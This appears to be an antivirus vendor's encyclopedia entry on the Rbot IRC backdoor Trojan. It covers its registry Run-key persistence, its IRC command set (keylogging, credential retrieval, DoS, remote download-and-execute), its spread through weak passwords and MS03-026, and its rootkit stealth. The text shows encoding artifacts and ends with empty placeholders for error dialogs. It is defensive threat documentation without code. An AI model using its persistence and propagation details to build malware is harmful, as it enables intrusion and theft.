Backdoor:Win32/Rbot.gen!A is a family of backdoor TrojansĀ thatĀ allows attackersĀ toĀ control infectedĀ computers. After a computer is infected, the Trojan connects to a specificĀ IRC server and joins a specific channel to receive commands from attackers. Commands can instructĀ the TrojanĀ toĀ spread to other computers by scanning for network shares with weak passwords, exploitingĀ Windows vulnerabilities, and spreading throughĀ backdoor ports opened by otherĀ families of malicious software. The Trojan can also allow attackers to performĀ other backdoor functions, such as launching denial of service (DoS) attacks andĀ retrieving system information from infected computers.
Ā
Installation
When Backdoor:Win32/Rbot.gen!A runs, it copies itself to %windir% or <system folder>. In many cases, it adds a value to one or more of the following registry keys:
Ā
Ā HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Ā HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
Ā HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Ā HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Ā
This change causes theĀ Trojan to run whenever Windows starts. Some variants also add a Windows system service to attain similar results.
Ā
Command & Control
Backdoor:Win32/Rbot.gen!A connects to an IRC server and joins a specific channel to receive commands. Commands can include actions such as:
-
Scanning for unpatched computers on the network.
-
Scanning portsĀ on the network.
-
Downloading and executing remote files.
-
Monitoring network traffic.
-
LaunchingĀ HTTP/HTTPD, SOCKS4, and TFTP/FTP servers.
-
Enabling orĀ disabling DCOM protocol.
-
RetrievingĀ computer configuration information,Ā includingĀ Windows logon information, user account information, open shares, file system information, andĀ network connection information.
-
Logging keystrokes.
-
Retrieving CD keys of games.
-
Capturing screens and Webcam shots.
-
Redirecting TCP traffic.
-
Uploading files through FTP.
-
Sending e-mail.
-
Manipulating processes and services.
-
Conducting denial of service (DoS) attacks.
Ā
Spreads Via..
Exploit/Network Shares/Previous System Compromise
Upon receiving IRC commands, theĀ Trojan can spread to remote computers by exploiting one or more Windows vulnerabilities. Win32/RbotĀ can spread to remote computers by trying weak passwords that it draws from a list. TheĀ Trojan may exploit the MS03-026 vulnerability to create a remote shell on the target computer. The Trojan uses the remote shell to copy and run itself on a remote computer.Ā The TrojanĀ can also be instructed through IRC commands toĀ spread through backdoor ports opened by Mydoom, Bagle, Optix, Netdevil,Ā and otherĀ malicious software families.
Ā
Payload
Modifies System Settings/Uses Advanced Stealth
Some variants of the Trojan terminate security-related products. Later variants of the Trojan can installĀ a kernel-mode rootkit driver, which hides the Trojan process from Task Manager and other process-viewer applications.
Ā
Due to the exploits used by this Trojan, critical system processes can terminate, also resulting in a full system shutdown and restart. This could occur in a continuous cycle until the threat is removed.
Ā
The following are examples of critical system process termination error message, andĀ system shutdown warning messages:
-
Operating system shut downĀ warning dialog box:
-
LSA Shell error report dialog box:
-
Operating system shut down warning message:
